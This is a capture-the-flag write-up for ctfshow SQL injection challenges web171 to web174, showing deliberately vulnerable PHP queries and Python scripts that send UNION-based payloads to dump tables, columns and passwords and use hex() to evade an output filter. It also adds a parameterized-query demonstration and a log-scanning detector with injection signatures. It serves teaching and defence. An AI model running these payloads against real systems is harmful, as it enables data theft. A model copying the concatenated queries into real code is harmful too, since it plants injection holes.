CtfShow SQL Injection - Continuously Updated

2023-05-18 11:32:39


web171

Query statement:

```php
// Build the SQL statement by string concatenation to look up the user with the given ID
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
```
```python
# Unfiltered string-type injection.
import requests
url = "http://66e1d748-4475-4aa9-8c95-fb3737690e46.challenge.ctf.show/api/?id="
# Enumerate table names in the current database
tablename = "-1' union select 1,2,group_concat(table_name) from information_schema.tables  where table_schema=database() -- "
# Enumerate column names of the user table
columnname = "-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' -- "
# Dump the data
payload = "-1' union select id,username,password from ctfshow_user -- "
# Append the chosen payload to the URL (swap in tablename / columnname for the earlier steps)
res = requests.get(url + payload)
print(res.text)
```
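Why the union payload above works, and what actually closes the hole, shown as an added example that is not code from this write-up or from ctfshow: a constructed SQLite table with the same shape as ctfshow_user, the challenge's string-concatenated query next to a parameterized one, and the write-up's own web171 payload sent to both. The table contents, the function names and the sample flag value are assumptions.

```python
import sqlite3


# Constructed stand-in for the challenge's ctfshow_user table (sample rows, not the real flag).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE ctfshow_user (id INTEGER, username TEXT, password TEXT);
        INSERT INTO ctfshow_user VALUES (1, 'alice', 'alice-pass');
        INSERT INTO ctfshow_user VALUES (2, 'bob', 'bob-pass');
        INSERT INTO ctfshow_user VALUES (26, 'flag', 'ctfshow{constructed-sample-flag}');
    """)
    return conn


def query_vulnerable(conn, user_id):
    # Same construction as the challenge's PHP: the id value is pasted into the SQL text,
    # so a quote in the value closes the literal and everything after it is parsed as SQL.
    # The "limit 1" and the "username != 'flag'" guard are both defeated by the comment.
    sql = ("select id,username,password from ctfshow_user "
           "where username != 'flag' and id = '" + user_id + "' limit 1;")
    return conn.execute(sql).fetchall()


def query_parameterized(conn, user_id):
    # Placeholder binding: the SQL text is fixed and the value travels as data,
    # so a quote or a UNION inside it is just characters compared against the id column.
    sql = ("select id,username,password from ctfshow_user "
           "where username != 'flag' and id = ? limit 1;")
    return conn.execute(sql, (user_id,)).fetchall()


def compare(user_id):
    """Run one id value through both query styles and return what each gives back."""
    conn = make_db()
    return {
        "vulnerable": query_vulnerable(conn, user_id),
        "parameterized": query_parameterized(conn, user_id),
    }


if __name__ == "__main__":
    # The write-up's web171 data-extraction payload, unchanged.
    payload = "-1' union select id,username,password from ctfshow_user -- "
    for label, rows in compare(payload).items():
        print(label, rows)
    print("normal lookup", compare("1"))
```

With the payload, the concatenated query returns every row including the flag user; the parameterized query returns nothing, because no integer id equals that string. A normal id such as `1` behaves identically in both, which is the point: binding parameters costs nothing for legitimate input.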

web172

```php
// Build the SQL statement by string concatenation to look up the user with the given ID
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag user
if($row->username!=='flag'){
    $ret['msg']='查询成功';
}
```
```python
# Unfiltered string-type injection, with the added restriction username != 'flag'.
import requests
url = "http://669d6879-73f9-4a49-97ac-56ca927f63b2.challenge.ctf.show/api/v2.php?id="
# Enumerate table names, then column names, then pull the flag user's password via a subquery
tablename = "0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- "
columnname = "0' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user2' -- "
payload = "0' union select 1,(select password from ctfshow_user2 where username='flag') -- "
# Append the chosen payload to the URL (swap in tablename / columnname for the earlier steps)
res = requests.get(url + payload)
print(res.text)
```

web173

```php
// Build the SQL statement by string concatenation to look up the user with the given ID
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag
if(!preg_match('/flag/i', json_encode($ret))){
  $ret['msg']='查询成功';
}
```
String-type injection again, now with a check that the JSON result must not match the regular expression /flag/i.
Use the hex function to bypass the regex filter.
```python
import requests
url = "http://8926a547-bbc7-4a5b-a20a-215fdc2c4037.challenge.ctf.show/api/v3.php?id="
# Table names do not contain "flag", so no encoding is needed here
tablename = "-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) -- "
# Wrap the result in hex() so the string "flag" never appears in the JSON output
columnname = "-1' union select 1,2,hex((select group_concat(column_name) from information_schema.columns where table_name = 'ctfshow_user3')) -- "
payload = "-1' union select 1,2,hex((select password from ctfshow_user3 where username='flag')) -- "
# Append the chosen payload to the URL (swap in tablename / columnname for the earlier steps)
res = requests.get(url + payload)
print(res.text)
```
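The web173 check looks for "flag" in the response, and the payload above shows hex() walking around it: filtering the output treats the symptom. A request-side check still sees the injection itself, because the UNION and information_schema text has to travel in the id parameter whatever encoding is applied to the SELECT list. As an added example that is not part of the write-up, this script parses a few constructed access-log lines modelled on the challenge URLs and flags the requests carrying the patterns this write-up uses; the log lines, the signature regexes and the rule names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines modelled on the challenge URLs; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [18/May/2023:11:32:39 +0800] "GET /api/?id=1 HTTP/1.1" 200 95
203.0.113.5 - - [18/May/2023:11:32:41 +0800] "GET /api/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--%20 HTTP/1.1" 200 160
203.0.113.5 - - [18/May/2023:11:32:44 +0800] "GET /api/v3.php?id=-1%27%20union%20select%201,2,hex((select%20password%20from%20ctfshow_user3%20where%20username=%27flag%27))%20--%20 HTTP/1.1" 200 140
198.51.100.9 - - [18/May/2023:11:33:02 +0800] "GET /api/?id=7 HTTP/1.1" 200 95
"""

# Common log format: client, identd, user, [time], "method target protocol", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Rule names and patterns are assumptions derived from the payload shapes in this write-up.
# They run against the decoded parameter value, so hex() around the SELECT list (web173)
# changes nothing: the UNION and information_schema tokens are still in the request.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b[\s/*]+(?:all[\s/*]+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("quote_then_comment", re.compile(r"'.*?(--|#|/\*)", re.S)),
]


def decode_params(target):
    """Split the query string; decode values a second time to undo double encoding."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return {name: unquote_plus(value) for name, value in pairs}


def scan_log(text):
    """Return one alert per request parameter that matches at least one signature."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for name, value in decode_params(m.group("target")).items():
            rules = [rule for rule, rx in SIGNATURES if rx.search(value)]
            if rules:
                alerts.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": urlsplit(m.group("target")).path,
                    "param": name,
                    "rules": rules,
                })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

On the sample, the two benign lookups produce nothing and both injected requests are flagged, the hex() one included. The regexes are deliberately narrow (a literal UNION ... SELECT, a dotted information_schema reference, a quote followed by a comment marker) so they can be tuned per application; the decoded-value matching is what matters, because these payloads arrive percent-encoded.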

web174

```php
// Build the SQL statement by string concatenation to look up the user with the given ID
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
// Check whether the result contains the flag or any digit
if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
  $ret['msg']='查询成功';
}
```
